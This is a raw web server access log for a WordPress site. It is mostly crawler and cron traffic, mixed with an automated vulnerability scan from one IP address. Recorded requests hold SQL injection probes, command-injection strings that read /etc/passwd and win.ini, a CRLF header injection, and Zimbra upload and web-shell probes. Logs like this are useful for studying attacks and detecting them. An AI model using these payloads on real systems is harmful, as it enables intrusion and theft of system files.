157.20.32.210 - - [18/Oct/2025:11:22:25 -0400] "GET /set_safety.shtml?r=52300 HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:22:26 -0400] "GET /sysinit.shtml?r=52300 HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - {{username}} [18/Oct/2025:11:23:20 -0400] "GET /delsnap.pl?name=|id HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0"
185.61.153.107 - - [18/Oct/2025:11:23:25 -0400] "POST /wp-cron.php?doing_wp_cron=1760801005.7673668861389160156250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:11:23:25 -0400] "POST /hms/admin/ HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:23:44 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 404 10843 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_10_3 rv:2.0; so-DJ) AppleWebKit/533.15.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.15.6"
185.61.153.107 - - [18/Oct/2025:11:19:22 -0400] "POST /wp-cron.php?doing_wp_cron=1760800761.6678919792175292968750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:11:19:10 -0400] "GET /products60939772?kg=0060196687 HTTP/1.1" 404 9732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.70.29.56 - - [18/Oct/2025:11:19:36 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
185.61.153.107 - - [18/Oct/2025:11:20:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760800817.7701110839843750000000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:11:20:13 -0400] "GET /products60906238?kg=0060163562 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:20:25 -0400] "POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1" 200 11643 "-" "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0"
20.171.207.254 - - [18/Oct/2025:11:22:15 -0400] "GET /products60932938?kg=0060189936 HTTP/1.1" 404 9739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:22:26 -0400] "GET /backupsettings.dat HTTP/1.1" 404 10901 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:22:44 -0400] "GET /ws-api/v2/users/me/details?token=02 HTTP/1.1" 404 12361 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0"
20.171.207.254 - - [18/Oct/2025:11:23:19 -0400] "GET /products60939608?kg=0060196525 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:23:55 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 404 10845 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_10_3 rv:2.0; so-DJ) AppleWebKit/533.15.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.15.6"
157.20.32.210 - - [18/Oct/2025:11:24:01 -0400] "POST /wp-json/woo-aliexpress/v1/product-sku HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0"
157.20.32.210 - - [18/Oct/2025:11:24:06 -0400] "GET /admin/index.php?page=home HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:11:24:27 -0400] "POST /wp-cron.php?doing_wp_cron=1760801067.4733710289001464843750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:24:25 -0400] "GET /products179069960?kg=0176886261 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:24:49 -0400] "GET /products158675408?kg=0156740425 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:25:04 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
185.61.153.107 - - [18/Oct/2025:11:25:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760801116.8703999519348144531250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:11:25:15 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
157.20.32.210 - - [18/Oct/2025:11:25:19 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 MarketGoo/2.1"
66.249.64.106 - - [18/Oct/2025:11:24:20 -0400] "GET /products13979064?kg=0013808669 HTTP/1.1" 200 29282 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
20.171.207.254 - - [18/Oct/2025:11:24:22 -0400] "GET /products60919690?kg=0060176848 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:25:01 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:25:02 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:25:08 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 MarketGoo/2.1"
157.20.32.210 - - [18/Oct/2025:11:25:13 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:25:14 -0400] "GET /admin/view_car.php?id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0"
157.20.32.210 - - [18/Oct/2025:11:25:26 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:25:28 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
20.171.207.254 - - [18/Oct/2025:11:25:22 -0400] "GET /products60919854?kg=0060177010 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:25:33 -0400] "GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5(999999999),8,9,10,11--+ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
157.20.32.210 - - [18/Oct/2025:11:25:44 -0400] "GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5(999999999),8,9,10,11--+ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
157.20.32.210 - - [18/Oct/2025:11:25:48 -0400] "GET /admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:25:57 -0400] "GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5(999999999),8,9,10,11--+ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
157.20.32.210 - - [18/Oct/2025:11:26:01 -0400] "GET /admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:26:09 -0400] "GET /products111887442?kg=0110523044 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:11:26:25 -0400] "GET /products60917800?kg=0060174981 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:25:25 -0400] "GET /admin/view_car.php?id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 404 10899 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0"
157.20.32.210 - - [18/Oct/2025:11:25:35 -0400] "GET /booking.php?car_id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.4"
157.20.32.210 - - [18/Oct/2025:11:25:37 -0400] "GET /admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:11:26:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760801175.0668089389801025390625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:26:21 -0400] "GET /products3413254?kg=0003371710 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:27:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760801237.6662569046020507812500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:27:22 -0400] "GET /products158684846?kg=0156749746 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:11:27:29 -0400] "GET /products60914406?kg=0060171630 HTTP/1.1" 404 9739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:11:27:30 -0400] "GET /products173231514?kg=0171119016 HTTP/1.1" 404 9743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
45.227.253.15 - - [18/Oct/2025:11:28:02 -0400] "GET /index.php/jk HTTP/1.1" 200 63 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:103.0) Gecko/20100101 Firefox/102.0"
185.61.153.107 - - [18/Oct/2025:11:28:34 -0400] "POST /wp-cron.php?doing_wp_cron=1760801314.4696519374847412109375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:11:28:30 -0400] "GET /products60903122?kg=0060160484 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:11:28:35 -0400] "GET /products6791158?kg=0006708422 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:28:44 -0400] "GET /products175137236?kg=0173001499 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:28:56 -0400] "GET /products233615790?kg=0230766898 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:29:08 -0400] "GET /products233964528?kg=0231111385 HTTP/1.1" 404 9732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:29:14 -0400] "GET /products80924406?kg=0079937606 HTTP/1.1" 404 9732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:29:20 -0400] "GET /products101950846?kg=0100707626 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:29:50 -0400] "GET /products34928192?kg=0034502321 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:26:58 -0400] "POST /webapi/auth HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:27:05 -0400] "POST /xmlrpc HTTP/1.1" 404 10849 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:27:09 -0400] "POST /webapi/auth HTTP/1.1" 404 10849 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:27:30 -0400] "GET /404%0dnew-header:value%0da: HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
206.189.247.132 - - [18/Oct/2025:11:27:57 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
35.179.127.15 - - [18/Oct/2025:11:27:57 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
66.249.64.106 - - [18/Oct/2025:11:28:20 -0400] "GET /categories/11141978 HTTP/1.1" 200 30363 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.105 - - [18/Oct/2025:11:28:31 -0400] "GET /?products4468800?kg=0004414385 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
98.70.29.56 - - [18/Oct/2025:11:28:40 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
216.73.216.159 - - [18/Oct/2025:11:29:02 -0400] "GET /products95226030?kg=0094064818 HTTP/1.1" 404 9731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:29:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760801356.3683249950408935546875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
66.249.64.106 - - [18/Oct/2025:11:29:21 -0400] "GET /products13065470?kg=0012906218 HTTP/1.1" 200 28965 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:11:29:31 -0400] "GET /products60873880?kg=0060131597 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:11:29:38 -0400] "GET /products32013488?kg=0031623161 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:11:30:10 -0400] "GET /products4846414?kg=0004787394 HTTP/1.1" 200 29307 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:11:30:40 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; en-ca) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20"
157.20.32.210 - - [18/Oct/2025:11:30:40 -0400] "GET /cgi-bin/popen.cgi?command=cat%20/etc/passwd&v=0.1303033443137912 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0"
157.20.32.210 - - [18/Oct/2025:11:30:40 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.17"
20.171.207.254 - - [18/Oct/2025:11:30:31 -0400] "GET /products60892102?kg=0060149598 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:11:30:02 -0400] "GET /products48426662?kg=0047836174 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:30:31 -0400] "POST /wp-cron.php?doing_wp_cron=1760801431.6686179637908935546875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:30:26 -0400] "GET /products76571436?kg=0075637719 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:30:40 -0400] "GET /cgi-bin/popen.cgi?command=type%20C://Windows/win.ini&v=0.1303033443137912 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:30:50 -0400] "GET /products135606106?kg=0133952456 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.107 - - [18/Oct/2025:11:31:19 -0400] "GET /products9274086?kg=0009161070 HTTP/1.1" 200 30832 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:11:31:25 -0400] "POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:31:25 -0400] "POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:11:31:25 -0400] "GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
157.20.32.210 - - [18/Oct/2025:11:31:25 -0400] "GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1" 404 10902 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
18.130.255.219 - - [18/Oct/2025:11:31:35 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
152.42.157.60 - - [18/Oct/2025:11:31:36 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:11:32:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760801534.3682410717010498046875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:32:18 -0400] "GET /products196981010?kg=0194578884 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:32:31 -0400] "POST /api/v2/open/rowsInfo HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1"
216.73.216.159 - - [18/Oct/2025:11:32:30 -0400] "GET /products194075664?kg=0191708969 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:32:45 -0400] "GET /wp-content/plugins/jeg-elementor-kit/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:32:54 -0400] "GET /products50720562?kg=0050102100 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:30:38 -0400] "GET /products89574458?kg=0088482168 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.106 - - [18/Oct/2025:11:30:46 -0400] "GET /products9274086?kg=0009161070 HTTP/1.1" 200 30833 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.159 - - [18/Oct/2025:11:31:02 -0400] "GET /products22793832?kg=0022515941 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:31:29 -0400] "POST /wp-cron.php?doing_wp_cron=1760801489.8684499263763427734375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
206.189.247.132 - - [18/Oct/2025:11:31:35 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
196.240.60.201 - - [18/Oct/2025:11:31:36 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:11:31:35 -0400] "GET /products60919404?kg=0060176567 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:11:32:06 -0400] "GET /products34936182?kg=0034510214 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:11:32:37 -0400] "GET /products60936132?kg=0060193091 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:11:32:42 -0400] "GET /products111916798?kg=0110552042 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:33:06 -0400] "GET /products76543684?kg=0075610307 HTTP/1.1" 404 9743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:33:27 -0400] "POST /wp-cron.php?doing_wp_cron=1760801607.5680670738220214843750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:33:38 -0400] "GET /products54901546?kg=0054232096 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
